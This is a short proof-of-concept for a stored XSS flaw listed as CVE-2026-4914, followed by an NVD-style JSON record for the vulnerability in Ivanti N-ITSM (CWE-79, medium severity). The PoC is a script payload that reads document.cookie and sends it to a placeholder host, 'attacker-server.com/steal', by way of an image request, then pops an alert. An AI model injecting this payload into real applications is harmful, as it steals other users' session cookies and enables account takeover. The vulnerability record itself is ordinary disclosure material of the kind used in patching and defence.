CVE-2026-4914

<!-- Stored XSS PoC for CVE-2026-4914 --> <!-- Attacker injects this payload into a vulnerable input field --> <script> // Example: Steal session cookies var img = new Image(); img.src = 'http://attacker-server.com/steal?cookie=' + document.cookie; // Example: Execute arbitrary JS console.log('XSS Executed'); alert(1); </script>

{"cve": {"id": "CVE-2026-4914", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2026-04-14T15:16:39.750", "lastModified": "2026-04-17T15:11:03.923", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored XSS in Ivanti N-ITSM before version 2025.4 allows a remote authenticated attacker to obtain limited information from other user sessions. User interaction is required."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2026-4913-CVE-2026-4914?language=en_US", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75"}]}}